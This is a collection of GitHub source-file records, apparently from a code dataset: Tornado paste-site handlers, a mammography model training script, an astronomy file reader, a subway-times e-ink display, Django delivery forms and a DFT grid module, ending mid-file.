@tornado.web.asynchronous\n @tornado.gen.engine\n def get(self, token):\n snippet = yield motor.Op(self.db.snippets.find_one, {'token': token})\n if not snippet:\n raise tornado.web.HTTPError(404)\n else:\n self.set_header('Content-Type', 'text/plain')\n self.write(snippet['content'])\n self.finish()\n\n\nclass SearchSnippetHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self):\n term = self.get_argument('term', '')\n if not term:\n self.render('search.html', snippets=[])\n self.finish()\n regex = re.compile('.*' + term + '.*', re.IGNORECASE)\n cursor = self.db.snippets.find({'title': regex}, sort=[('title', 1)])\n snippets = yield motor.Op(cursor.to_list)\n self.render('search.html', snippets=snippets)\n\n\nclass RegistrationHandler(TPasteHandler):\n\n def get(self):\n if self.current_user:\n self.redirect('/')\n self.render('registration.html')\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def post(self):\n if self.current_user:\n self.redirect('/')\n form = forms.RegistrationForm(self.get_dict_arguments())\n if form.validate():\n user = {\n 'username': self.get_argument('username_reg'),\n 'email': self.get_argument('email_reg'),\n 'password': self.get_argument('password_reg'),\n 'status': 'registered',\n 'join': {\n 'date': datetime.datetime.now(),\n 'token': stringhelper.generate_md5()\n },\n \"recover\": {}\n }\n u = yield motor.Op(self.db.users.find_one,\n {'$or': [{'username': user['username']},\n {'email': user['email']}]}, fields={'_id': 1})\n if u:\n self.write_ajax_error(\n {'email_reg': [messages.registered_email]})\n self.finish()\n else:\n user['password'] = bcrypt.hashpw(user['password'],\n bcrypt.gensalt())\n message = mailhelper.BaseEmailMessage(user['email'],\n messages.confirm_registration,\n 'registration.html',\n connection=self.smtp,\n user=user\n )\n yield tornado.gen.Task(message.send)\n yield motor.Op(self.db.users.insert, user)\n self.render(\"showmessage.html\",\n message=messages.confirmregistration)\n else:\n self.write_ajax_error(form.errors)\n self.finish()\n\n\nclass RegistrationSuccessfullyHandler(TPasteHandler):\n\n def get(self):\n if self.current_user:\n self.redirect('/')\n self.render('showmessage.html',\n message=messages.registrationsuccessfully)\n\n\nclass LoginHandler(TPasteHandler):\n\n def get(self):\n if self.current_user:\n self.redirect('/')\n self.render('login.html', email=None, message=None,\n _next=self.get_argument('next', '/'))\n\n @tornado.web.asynchronous\n def post(self):\n pass\n\n\nclass LogoutHandler(TPasteHandler):\n\n def get(self):\n self.redirect('/')\n\n def post(self):\n if self.current_user:\n self.clear_cookie('current_user')\n self.redirect('/')\n\n\nclass RecoverPasswordHandler(TPasteHandler):\n\n def get(self):\n if not self.current_user:\n self.render('recoverpassword.html')\n else:\n self.redirect('/')\n\n def post(self):\n pass\n","repo_name":"puentesarrin/tpaste","sub_path":"tpaste/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":8769,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"34264777770","text":"import argparse\nimport os\nfrom datetime import timedelta\nfrom glob import glob\n\nimport pandas as pd\nimport tables\nimport wandb\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.loggers import WandbLogger\nfrom torch.utils.data import IterableDataset, WeightedRandomSampler\n\nfrom datasets import getDatasets, GenericCollate\nimport pytorch_lightning as pl\n#from torchsample.samplers import StratifiedSampler\n\n# needed for the caching hack implemented in the dataset ....\nimport torch.multiprocessing\ntorch.multiprocessing.set_sharing_strategy('file_system')\nfrom models import EndToEnd_AMIL\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-gpu\", default='0', type=str)\n parser.add_argument(\"--bs\", default=4, type=int)\n parser.add_argument(\"-maxEpochs\", default=200, type=int)\n parser.add_argument(\"--backbone\", default='xcit_nano_12_p16_224_dist')\n #parser.add_argument(\"--backbone\", default='mobilenetv3_small_075')\n #parser.add_argument(\"-quarter\", action=\"store_true\")\n #parser.add_argument(\"-tenth\", action=\"store_true\")\n #parser.add_argument(\"-sampler\", default='half', choices=['half', 'quarter', 'tenth'])\n parser.add_argument(\"--sampler\", default=16.0, type=float)\n parser.add_argument(\"--lr\", default=0.001, type=float) # FIXME\n parser.add_argument(\"--reducedDim\", default=64, type=int)\n parser.add_argument(\"--hiddenAttn\", default=0, type=int)\n parser.add_argument(\"--opt\", default='sgd')\n parser.add_argument(\"-wandb\", default='mamm-end2end-amil')\n #parser.add_argument(\"--lossFun\", default='focal')\n #parser.add_argument(\"--lossFun\", default='BCE_F')\n parser.add_argument(\"--lossFun\", default='BCE')\n #parser.add_argument(\"--gated\", action='store_true') # ugh\n parser.add_argument(\"--gated\", default=False)\n parser.add_argument(\"--noise\", type=float, default=0.0)\n parser.add_argument(\"--dropout\", type=float, default=0.25)\n parser.add_argument(\"--weightDecay\", type=float, default=0.0)\n parser.add_argument(\"--l1\", type=float, default=0.0)\n parser.add_argument(\"--focalAlpha\", type=float, default=0.95)\n parser.add_argument(\"--focalGamma\", type=float, default=2.0)\n parser.add_argument(\"--focalReduction\", type=str, default='sum')\n parser.add_argument(\"--tileLimit\", type=int, default=8)\n parser.add_argument(\"--colorize\", type=int, default=2)\n parser.add_argument(\"--model\", default='MAX')\n #parser.add_argument(\"-l1norm\", action='store_true')\n args = parser.parse_args()\n\n if args.lossFun.lower() != 'focal':\n args.focalAlpha, args.focalGamma, args.focalReduction = None, None, None\n\n #args.gated = True # FIXME\n #if args.gated.lower() == 'true': args.gated = True\n #elif args.gated.lower() == 'false': args.gated = False\n\n trainDataset, valDataset = getDatasets(args)\n\n print('train/val split : ', trainDataset.imagesDF.shape, valDataset.imagesDF.shape)\n\n tiles, lbl = trainDataset[0]\n print(tiles)\n print(lbl)\n\n\n labels = torch.from_numpy(trainDataset.imagesDF.cancer.to_numpy())\n\n if args.sampler == 0:\n raise ValueError('Dont')\n sampler = None\n else:\n class_count = list(trainDataset.imagesDF.cancer.value_counts())\n class_count[1] = args.sampler * class_count[1] # overweight the positive cases. If sampler=1.0, then its trained 50/50\n print(class_count)\n class_weights = 1. / torch.tensor(class_count, dtype=torch.float)\n print(class_weights)\n class_weights_all = class_weights[labels]\n print(class_weights_all)\n sampler = WeightedRandomSampler(weights=class_weights_all, num_samples=len(class_weights_all), replacement=True)\n\n trainCollate = GenericCollate(training=True)\n valCollate = GenericCollate(training=False)\n\n trainDataloader = torch.utils.data.DataLoader(trainDataset, batch_size=args.bs, persistent_workers=True,\n shuffle=False, drop_last=False, num_workers=2, collate_fn=trainCollate, sampler=sampler)\n\n valDataloader = torch.utils.data.DataLoader(valDataset, batch_size=1, persistent_workers=True,\n shuffle=True, drop_last=False, num_workers=2, collate_fn=valCollate)\n\n '''\n if args.wandb:\n run = wandb.init(project=args.wandb)\n conf = run.config\n conf.backbone = args.backbone\n del args.wandb\n wandb.config.update(args)\n #print(run.name)\n name = run.name\n else:\n run, name = None, None\n '''\n\n wandb_logger = WandbLogger(project=args.wandb)\n del args.wandb\n wandb_logger.log_hyperparams(args)\n name = wandb_logger.experiment.name\n run=None\n\n\n checkpoint_callback = ModelCheckpoint(\n dirpath=f\"/fast/rsna-breast/checkpoints/AMIL_end2end/{args.backbone}/{name}/\",\n save_top_k=2, monitor=\"score\", mode='max', train_time_interval=timedelta(minutes=10)\n )\n\n dev = args.gpu if torch.cuda.is_available() else 0\n if ',' not in dev: dev=[int(dev)]\n else: dev = [int(g) for g in dev.split(',')]\n\n trainer = pl.Trainer(max_epochs=args.maxEpochs, callbacks=[checkpoint_callback],\n logger=wandb_logger, log_every_n_steps=10,\n accelerator='gpu',\n #devices=[dev],\n devices=dev,\n #val_check_interval=0.1,\n #val_check_interval=10,\n #limit_train_batches=1024,\n limit_train_batches=64,\n #limit_val_batches=256, # 11k validation images, so this is 1/43 of the validation set\n #limit_val_batches=512,\n num_sanity_val_steps=1,\n accumulate_grad_batches=16,\n #accumulate_grad_batches=128,\n #check_val_every_n_epoch=512,\n )\n\n model = EndToEnd_AMIL(args, model=args.model, backbone=args.backbone, wandbRun=run, opt=args.opt, lr=args.lr,\n nReduced=args.reducedDim, nHiddenAttn=args.hiddenAttn, lossFun=args.lossFun,\n gated=args.gated, dropout=args.dropout, weightDecay=args.weightDecay, l1_lambda=args.l1,\n focalAlpha=args.focalAlpha, focalGamma=args.focalGamma, focalReduction=args.focalReduction\n )\n\n #chkpts = '/fast/rsna-breast/checkpoints/tileClassifier'\n #chkpt = f'{chkpts}/deit3_small_patch16_224_sweepy-sweep-45/epoch=83-step=21270.ckpt'\n\n chkpt = '/fast/rsna-breast/checkpoints/tileClassifier/xcit_nano_12_p16_224_dist_polished-leaf-74/epoch=17-step=10549.ckpt'\n\n stateDict = torch.load(chkpt)['state_dict']\n #print(stateDict.keys())\n #model.encoder.load_state_dict(stateDict, strict=False)\n\n trainer.fit(model=model, train_dataloaders=trainDataloader, val_dataloaders=valDataloader)\n #trainer.fit(model=model, train_dataloaders=trainDataloader)\n\n\n\n","repo_name":"cjmielke/rsna-mammography","sub_path":"AMIL_end2end/trainLightning.py","file_name":"trainLightning.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1776383467","text":"import re\nfrom pathlib import Path\nfrom collections import namedtuple, defaultdict\nfrom itertools import count\nfrom dataclasses import dataclass, field\nfrom typing import Any\nfrom queue import PriorityQueue, Empty\n\nfrom ctapipe.core import Component, Provenance\nfrom ctapipe.core.traits import Bool, Integer\nfrom protozfits import File\n\n__all__ = ['MultiFiles']\n\n\nFileInfo = namedtuple(\"FileInfo\", \"tel_id run subrun stream extra\")\nR0_RE = re.compile(r\"LST-(\\d+)\\.(\\d+)\\.Run(\\d+)\\.(\\d+)(.*)\\.fits\\.fz\")\nR0_PATTERN = \"LST-{tel_id}.{stream}.Run{run:05d}.{subrun:04d}{extra}.fits.fz\"\n\n@dataclass(order=True)\nclass NextEvent:\n \"\"\"Class to get sorted access to events from multiple files\"\"\"\n priority: int\n event: Any = field(compare=False)\n stream: int = field(compare=False)\n\n\ndef _parse_match(match):\n groups = list(match.groups())\n values = [int(v) for v in groups[:4]]\n return FileInfo(tel_id=values[0], run=values[2], subrun=values[3], stream=values[1], extra=groups[4])\n\n\ndef get_file_info(path):\n \"\"\"Generic function to search a filename for the LST-t.s.Runxxxxx.yyyy\"\"\"\n path = Path(path)\n m = R0_RE.match(path.name)\n if m is None:\n raise ValueError(f\"Filename {path} does not include pattern {R0_RE}\")\n\n return _parse_match(m)\n\n\nclass MultiFiles(Component):\n '''Open multiple stream files and iterate over events in order'''\n\n all_streams = Bool(\n default_value=True,\n help=(\n \"If true, try to open all streams in parallel.\"\n \" Only applies when given file matches the expected naming pattern and is stream 1.\"\n )\n ).tag(config=True)\n\n all_subruns = Bool(\n default_value=False,\n help=(\n \"If true, try to iterate over all subruns.\"\n \" Only applies when file matches the expected naming pattern and subrun is 0\"\n )\n ).tag(config=True)\n\n last_subrun = Integer(\n default_value=None,\n allow_none=True,\n help=\"If not None, stop loading new subruns after ``last_subrun`` (inclusive)\"\n ).tag(config=True)\n\n def __init__(self, path, *args, **kwargs):\n \"\"\"\n Create a new MultiFiles object from an iterable of paths\n\n Parameters\n ----------\n paths: Iterable[string|Path]\n The input paths\n \"\"\"\n super().__init__(*args, **kwargs)\n self.path = Path(path)\n if not self.path.is_file():\n raise IOError(f\"input path {path} is not a file\")\n\n self.directory = self.path.parent\n self.current_subrun = None\n\n try:\n file_info = get_file_info(self.path)\n except ValueError:\n file_info = None\n\n if file_info is not None:\n if file_info.stream != 1:\n self.log.info(\"Input file has stream != 1, not loading more streams or subruns\")\n self.all_streams = False\n self.all_subruns = False\n\n self.current_subrun = defaultdict(lambda: self.file_info.subrun - 1)\n else:\n self.log.warning(\"Input file does not match LST name pattern, not trying to load more streams or subruns\")\n self.all_subruns = False\n self.all_streams = False\n\n self.file_info = file_info\n self._files = {}\n self._events = PriorityQueue()\n self._events_tables = {}\n self._headers = {}\n self.camera_config = None\n self.dvr_applied = None\n\n if self.all_streams and file_info is not None:\n for stream in count(1):\n try:\n self._load_next_subrun(stream)\n except IOError:\n break\n else:\n self._load_next_subrun(None)\n\n if len(self._files) == 0:\n raise IOError(f\"No file loaded for path {path}\")\n\n @property\n def n_open_files(self):\n return len(self._files)\n\n def _load_next_subrun(self, stream):\n \"\"\"Open the next (or first) subrun.\n\n Parameters\n ----------\n stream : int or None\n If None, assume the single-file case and just open it.\n \"\"\"\n if self.file_info is None and stream is not None:\n raise ValueError(\"Input path does not allow automatic subrun loading\")\n\n if stream is None:\n path = self.path\n else:\n self.current_subrun[stream] += 1\n\n if self.last_subrun is not None and self.current_subrun[stream] > self.last_subrun:\n self.log.info(\"Stopping loading of subruns because of last_subrun\")\n return\n\n path = self.directory / R0_PATTERN.format(\n tel_id=self.file_info.tel_id,\n run=self.file_info.run,\n subrun=self.current_subrun[stream],\n stream=stream,\n extra=self.file_info.extra,\n )\n\n if not path.is_file():\n raise FileNotFoundError(f\"File {path} does not exist\")\n\n if stream in self._files:\n self._files.pop(stream).close()\n\n Provenance().add_input_file(str(path), \"R0\")\n file_ = File(str(path))\n self._files[stream] = file_\n self.log.info(\"Opened file %s\", path)\n self._events_tables[stream] = file_.Events\n self._headers[stream] = self._events_tables[stream].header\n dvr_applied = self._headers[stream].get(\"LSTDVR\", False)\n if self.dvr_applied is None:\n self.dvr_applied = dvr_applied\n elif dvr_applied != self.dvr_applied:\n raise IOError(\"Mixing subruns / streams with and without DVR applied is not supported\")\n\n # load first event from each stream\n event = next(self._events_tables[stream])\n self._events.put_nowait(NextEvent(event.event_id, event, stream))\n\n # make sure we have a camera config\n if hasattr(file_, \"CameraConfig\"):\n config = next(file_.CameraConfig)\n self.cta_r1 = False\n else:\n # new files use CameraConfiguration\n self.cta_r1 = True\n config = next(file_.CameraConfiguration)\n \n if self.camera_config is None:\n self.camera_config = config\n\n def close(self):\n '''Close the underlying files'''\n for f in self._files.values():\n f.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n # check for the minimal event id\n if not self._events:\n raise StopIteration\n\n try:\n next_event = self._events.get_nowait()\n except Empty:\n raise StopIteration\n\n stream = next_event.stream\n event = next_event.event\n\n try:\n new = next(self._events_tables[stream])\n self._events.put_nowait(NextEvent(new.event_id, new, stream))\n except StopIteration:\n if self.all_subruns:\n try:\n self._load_next_subrun(stream)\n except FileNotFoundError:\n pass\n\n return event\n","repo_name":"cta-observatory/ctapipe_io_lst","sub_path":"src/ctapipe_io_lst/multifiles.py","file_name":"multifiles.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17731185043","text":"from underground import metadata, SubwayFeed\nfrom PIL import Image, ImageFont, ImageDraw\nfrom inky import InkyPHAT\nfrom functools import reduce\nfrom datetime import datetime\nfrom dotenv import Dotenv\nimport os\n\ndotenv = Dotenv(os.path.join(os.path.dirname(__file__), '.envrc'))\nos.environ.update(dotenv)\n\ninky_display = InkyPHAT(\"yellow\")\ninky_display.set_border(inky_display.WHITE)\nfont = ImageFont.truetype(\n \"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 24)\nsmall_font = ImageFont.truetype(\n \"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 8)\n\nAPI_KEY = os.getenv('MTA_API_KEY')\n\nQ_ROUTE = 'Q'\nB_ROUTE = 'B'\nSTATIONS = [\n {\"route\": Q_ROUTE, \"station\": 'D24N', \"direction\": 'North'},\n {\"route\": B_ROUTE, \"station\": 'D24N', \"direction\": 'North'}\n]\n\n\ndef get_station_times(station_data):\n route = station_data.get('route')\n station = station_data.get('station')\n feed = SubwayFeed.get(route, api_key=API_KEY)\n stops = feed.extract_stop_dict().get(route, dict()).get(station, [])\n labeled_stops = [{\"route\": route, \"time\": t} for t in stops]\n return labeled_stops\n\n\ndef draw_route(draw, route, y):\n bg_color = inky_display.YELLOW if route == Q_ROUTE else inky_display.WHITE\n fg_color = inky_display.WHITE if route == Q_ROUTE else inky_display.BLACK\n outline = inky_display.YELLOW if route == Q_ROUTE else inky_display.BLACK\n x_pos = 18 if route == Q_ROUTE else 20\n draw.ellipse([(12, y), (42, y+30)], bg_color, outline)\n draw.text((x_pos, y + 1), route, fg_color, font)\n\n\ndef draw_time(draw, time, y):\n draw.text((48, y), time.strftime('%-I:%M %p'), inky_display.BLACK, font)\n\n\ndef draw_row(draw, arrival, y):\n draw_route(draw, arrival.get('route', ''), y)\n draw_time(draw, arrival.get('time', ''), y)\n\n\ndef draw_updated(draw):\n message = 'Updated: {}'.format(datetime.now().strftime('%-I:%M:%S %p'))\n w, h = small_font.getsize(message)\n\n x = (inky_display.WIDTH - w)\n y = (inky_display.HEIGHT - h)\n draw.text((x, y,), message, inky_display.BLACK, small_font)\n\n\ndef print_to_inky(train_one, train_two):\n img = Image.new(\"P\", (inky_display.WIDTH, inky_display.HEIGHT))\n draw = ImageDraw.Draw(img)\n draw.line([(0, inky_display.HEIGHT / 2), (inky_display.WIDTH,\n inky_display.HEIGHT / 2)], inky_display.BLACK, 1)\n draw_row(draw, train_one, 14)\n draw_row(draw, train_two, inky_display.HEIGHT - 42)\n draw_updated(draw)\n inky_display.set_image(img)\n inky_display.show()\n\n\ndef main():\n times = reduce(lambda x, y: x+y,\n [get_station_times(station) for station in STATIONS])\n sorted_times = sorted(times, key=lambda k: k['time'])\n # first = sorted_times[0]\n # second = sorted_times[1]\n first, second, *_ = sorted_times\n print_to_inky(first, second)\n\n\nmain()\n","repo_name":"ChrisW-B/inky-subway","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14918905853","text":"sundayCount = 0\ntotalDay = 0\nmonths = [('Jan',31),('Feb',28),('Mar',31),('Apr',30),('May',31),('Jun',30),('Jul',31),('Aug',31),('Sep',30),('Oct',31),('Nov',30),('Dec',31)]\nfor year in range(1900,2001):\n for month in months:\n if month[0]=='Feb' and year%4==0 and year!=0:\n print(year,month[0],month[1]+1,\"leap year\")\n totalDay=totalDay+month[1]+1\n else :\n print(year,month[0],month[1])\n totalDay=totalDay+month[1]\n print(totalDay,(totalDay-6)%7)\n if (totalDay-6)%7 == 0 and year>1900:\n sundayCount+=1\nprint(sundayCount)\nprint(sundayCount-1)\n","repo_name":"stealpotsyear/algorithm_basic","sub_path":"project euler/Problem19.py","file_name":"Problem19.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24505040961","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import Q\nfrom .models import Entrega, Morador, Porteiro\nfrom django.forms.widgets import DateTimeInput\n\n\n\nclass EntregaForm(forms.ModelForm):\n nome = forms.CharField(required=True, label='Nome')\n bloco = forms.IntegerField(required=True, label='Bloco')\n apartamento = forms.IntegerField(required=True, label='Apartamento')\n andar = forms.IntegerField(required=True, label='Andar')\n email = forms.EmailField(required=True, label='Email') \n entrada = forms.DateTimeField(required=False, label='Data de Entrada', widget=DateTimeInput(attrs={'type': 'datetime-local'}))\n porteiro = forms.ModelChoiceField(queryset=Porteiro.objects.all(), empty_label=\"Selecione um porteiro\", label=\"Porteiro\")\n \n\n\n class Meta:\n model = Entrega\n fields = [\n 'nome',\n 'bloco',\n 'andar',\n 'apartamento',\n 'email',\n 'entrada',\n 'porteiro'\n\n ]\n labels = {\n 'morador': 'Morador',\n 'nome': 'Nome',\n 'bloco': 'Bloco',\n 'andar': 'Andar',\n 'apartamento': 'Apartamento',\n 'email': 'Email',\n 'entrada': 'Data de Entrada',\n 'porteiro': 'Porteiro'\n\n }\n\n\nclass MoradorForm(forms.ModelForm):\n nome = forms.CharField(required=True, label='Nome')\n bloco = forms.IntegerField(required=True, label='Bloco')\n apartamento = forms.IntegerField(required=True, label='Apartamento')\n andar = forms.IntegerField(required=True, label='Andar')\n email = forms.EmailField(required=True, label='Email')\n\n class Meta:\n model = Morador\n fields = [\n 'nome',\n 'bloco',\n 'andar',\n 'apartamento',\n 'email',\n ]\n labels = {\n 'nome': 'Nome',\n 'bloco': 'Bloco',\n 'andar': 'Andar',\n 'apartamento': 'Apartamento',\n 'email': 'Email',\n }\n\n def clean(self):\n cleaned_data = super().clean()\n nome = cleaned_data.get('nome')\n bloco = cleaned_data.get('bloco')\n apartamento = cleaned_data.get('apartamento')\n andar = cleaned_data.get('andar')\n email = cleaned_data.get('email')\n\n if Morador.objects.filter(Q(nome=nome) & Q(bloco=bloco) & Q(apartamento=apartamento) & Q(andar=andar) & Q(email=email)).exists():\n raise ValidationError('Morador já cadastrado') \n\n\n","repo_name":"Willartes/projeto","sub_path":"entregas/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"543510881","text":"import numpy as np\nfrom scipy.interpolate import splrep, splev\nimport scipy.special as sp\nfrom ase.cell import Cell\nfrom dftpy.math_utils import spacing2ecut, ecut2nr\nfrom dftpy.mpi import MP\n\nclass BaseGrid:\n \"\"\"\n Object representing a grid (Cell (lattice) plus discretization)\n extends Cell\n\n Attributes\n ----------\n nr : array of numbers used for discretization\n\n nnr : total number of grid points\n\n dV : volume of a grid point\n\n Node:\n Virtual class, DirectGrid and ReciprocalGrid should be used in actual applications\n\n \"\"\"\n\n def __init__(self, lattice, nr = None, origin=np.array([0.0, 0.0, 0.0]), full=True, direct=True,\n cplx=False, mp=None, ecut = None, comm = None, **kwargs):\n if mp is None :\n mp = MP(comm)\n self._origin = np.asarray(origin)\n if not isinstance(lattice, Cell):\n cell=Cell(lattice)\n else:\n cell=lattice\n #\n self.cplx = cplx\n self._cell = cell\n self._direct = direct\n #\n if nr is None : nr = ecut2nr(ecut=ecut, lattice=lattice, **kwargs)\n #\n self._nrR = np.array(nr, dtype = np.int32)\n self._nnrR = np.prod(self._nrR)\n self._dV = np.abs(self.cell.volume) / self._nnrR\n self._nrG = self._nrR.copy()\n if not full :\n self._nrG[-1] = self._nrG[-1] // 2 + 1\n self._nnrG = np.prod(self._nrG)\n self._spacings = self.cell.lengths() / self._nrR\n self._mp = mp\n if self.cplx :\n full = True\n self.local_slice(nr, direct = direct, full = full, cplx = cplx, **kwargs)\n self._nnr = np.prod(self._nr)\n # print('nr_local', self.mp.comm.rank, self._nr, direct, self.mp.comm.size, flush = True)\n self._full = full\n self._ecut = ecut\n\n def __eq__(self, other: 'BaseGrid') -> bool:\n if np.allclose(self.lattice, other.lattice) and np.allclose(self.nrR, other.nrR):\n return True\n else :\n return False\n\n @property\n def mp(self):\n return self._mp\n\n @mp.setter\n def mp(self, value):\n self._mp = value\n\n @property\n def nr(self):\n return self._nr\n\n @property\n def nnr(self):\n return self._nnr\n\n @property\n def nrR(self):\n return self._nrR\n\n @property\n def nnrR(self):\n return self._nnrR\n\n @property\n def nrG(self):\n return self._nrG\n\n @property\n def nnrG(self):\n return self._nnrG\n\n @property\n def dV(self):\n return self._dV\n\n @property\n def volume(self):\n return self.cell.volume\n\n @property\n def spacings(self):\n return self._spacings\n\n @property\n def cell(self):\n return self._cell\n\n @property\n def full(self):\n return self._full\n\n @property\n def direct(self):\n return self._direct\n\n @property\n def origin(self):\n return self._origin\n\n def tile(self, reps=1):\n # it only repeat last three dimensions with same rep\n if self.mp.size > 1:\n raise ValueError(\"Only works for serial version.\")\n try:\n tup = tuple(reps)\n except TypeError:\n tup = (reps,)\n reps = np.ones(3, dtype='int')\n for i, x in enumerate(tup):\n reps[i] = x\n lattice = self.lattice.copy()\n for i in range(3):\n lattice[i] *= reps[i]\n nr = self.nr * reps\n results = self.__class__(lattice, nr, origin=self.origin, full=self.full, cplx=self.cplx, direct=self.direct)\n return results\n\n def create(self, lattice=None, **kwargs):\n options={\n 'origin' : self.origin,\n 'full' : self.full,\n 'cplx' : self.cplx,\n 'mp' : self.mp,\n 'ecut' : self.ecut,\n }\n if lattice is None: lattice = self.cell\n options.update(kwargs)\n results = self.__class__(lattice, **options)\n return results\n\n def repeat(self, rep=1):\n # it only repeat last three dimensions with same rep\n if not isinstance(rep, int):\n raise AttributeError(\"Grid repeat only support one integer, Please use 'tile'.\")\n if self.rank == 1 :\n reps = np.ones(3, dtype='int')*rep\n return self.tile(reps)\n\n def local_slice(self, nr, **kwargs):\n self._slice, self._nr, self._offsets = self.mp.get_local_fft_shape(nr, **kwargs)\n if self.mp.is_mpi :\n self.slice_all = self.mp.comm.allgather(self._slice)\n self.nr_all = self.mp.comm.allgather(self._nr)\n self.offsets_all = self.mp.comm.allgather(self._offsets)\n else :\n self.slice_all = self._slice\n self.nr_all = self._nr\n self.offsets_all = self._offsets\n\n @property\n def slice(self):\n return self._slice\n\n @property\n def offsets(self):\n return self._offsets\n\n def gather(self, data, nr = None, out = None, root = 0, **kwargs):\n if self.mp.is_mpi :\n reqs = []\n bufs = []\n rank = 1 if getattr(data, 'ndim', 1) < 4 else data.shape[0]\n if self.mp.rank == root:\n if out is None :\n if nr is None : nr = self.nrR\n if rank>1 : nr = (rank, *nr)\n out = np.empty(nr, dtype = data.dtype)\n for i in range(0, self.mp.comm.size):\n if i == root :\n buf = data\n else :\n shape = self.nr_all[i]\n if rank>1 : shape = (rank, *shape)\n buf = np.empty(shape, dtype = data.dtype)\n req = self.mp.comm.Irecv(buf, source = i, tag = i)\n reqs.append(req)\n bufs.append(buf)\n else :\n req = self.mp.comm.Isend(data, dest = root, tag = self.mp.rank)\n reqs.append(req)\n out = np.ones(rank)\n self.mp.MPI.Request.Waitall(reqs)\n if self.mp.rank == root:\n for i in range(0, self.mp.comm.size):\n inds = self.slice_all[i]\n if rank>1 : inds = (slice(None), *inds)\n out[inds] = bufs[i]\n self.mp.comm.Barrier()\n else :\n if out is None :\n out = data.copy()\n else :\n out[:] = data\n return out\n\n def scatter(self, data, out = None, root = 0, **kwargs):\n if self.mp.is_mpi :\n reqs = []\n rank = 1 if getattr(data, 'ndim', 1) < 4 else data.shape[0]\n rank = self.mp.amax(rank)\n if out is None :\n nr = self.nr\n if rank>1 : nr = (rank, *nr)\n out = np.empty(nr, dtype = data.dtype)\n if self.mp.rank == root :\n for i in range(0, self.mp.comm.size):\n if i == root :\n inds = self.slice_all[i]\n if rank>1 : inds = (slice(None), *inds)\n out[:] = data[inds]\n else :\n shape = self.nr_all[i]\n inds = self.slice_all[i]\n if rank>1 :\n shape = (rank, *shape)\n inds = (slice(None), *inds)\n buf = np.empty(shape, dtype = data.dtype)\n buf[:] = data[inds]\n req = self.mp.comm.Isend(buf, dest = i, tag = i)\n reqs.append(req)\n else :\n req = self.mp.comm.Irecv(out, source = root, tag = self.mp.rank)\n reqs.append(req)\n self.mp.MPI.Request.Waitall(reqs)\n self.mp.comm.Barrier()\n else :\n if out is None :\n out = data.copy()\n else :\n out[:] = data\n return out\n\n def free(self):\n self.mp.free()\n\n @property\n def lattice(self):\n return self.cell.array\n\n @property\n def ecut(self):\n if self._ecut is None :\n if hasattr(self, 'guess_ecut'):\n ecut = self.guess_ecut()\n elif hasattr(self, 'get_direct'):\n ecut = self.get_direct().guess_ecut()\n else :\n ecut = None\n else :\n ecut = self._ecut\n return ecut\n\n @ecut.setter\n def ecut(self, value):\n self._ecut = value\n if hasattr(self, 'Dgrid'):\n self._qmask = None\n if hasattr(self.Dgrid, '_ecut'):\n self.Dgrid._ecut = value\n elif hasattr(self, 'RPgrid'):\n if hasattr(self.RPgrid, '_ecut'):\n self.RPgrid._ecut = value\n self.RPgrid._qmask = None\n\n\nclass DirectGrid(BaseGrid):\n \"\"\"\n Attributes:\n ----------\n All of BaseGrid and DirectCell\n\n r : cartesian coordinates of each grid point\n\n s : crystal coordinates of each grid point\n \"\"\"\n\n def __init__(self, lattice, nr = None, origin=np.array([0.0, 0.0, 0.0]), full=True, uppergrid=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n lattice : array_like[3,3]\n matrix containing the direct lattice vectors (as its colums)\n \"\"\"\n self.init_options = locals()\n for k in ['__class__', 'self', 'kwargs', 'uppergrid'] :\n self.init_options.pop(k, None)\n self.init_options.update(kwargs)\n super().__init__(lattice=lattice, nr=nr, origin=origin, full=full, direct=True, **kwargs)\n self._r = None\n self._rr = None\n self._s = None\n self.RPgrid = uppergrid\n self._Rtable = None\n\n def __eq__(self, other):\n \"\"\"\n Implement the == operator in the DirectGrid class.\n Refer to the __eq__ method of Grid for more information.\n \"\"\"\n if not isinstance(other, DirectGrid):\n raise TypeError(\"You can only compare a DirectGrid with another DirectGrid\")\n return BaseGrid.__eq__(self, other)\n\n def _calc_grid_crys_points(self):\n if self._s is None:\n # s0 = np.linspace(0, 1, self.nr[0], endpoint=False)\n # s1 = np.linspace(0, 1, self.nr[1], endpoint=False)\n # s2 = np.linspace(0, 1, self.nr[2], endpoint=False)\n # S0, S1, S2 = np.meshgrid(s0, s1, s2, indexing=\"ij\")\n # self._s = np.asarray([S0, S1, S2])\n ax = []\n for i in range(3):\n s0 = np.linspace(0, 1, self.nrR[i], endpoint=False)\n ax.append(s0)\n AX = [a[sl] for a, sl in zip(ax, self.slice)]\n S = np.meshgrid(*AX, indexing=\"ij\")\n self._s = np.asarray(S)\n\n def _calc_grid_cart_points(self):\n if self._r is None:\n self._r = np.einsum(\"j...,jk->k...\", self.s, self.lattice)\n\n @property\n def r(self):\n if self._r is None:\n self._calc_grid_cart_points()\n return self._r\n\n @property\n def rr(self):\n if self._rr is None:\n rr = 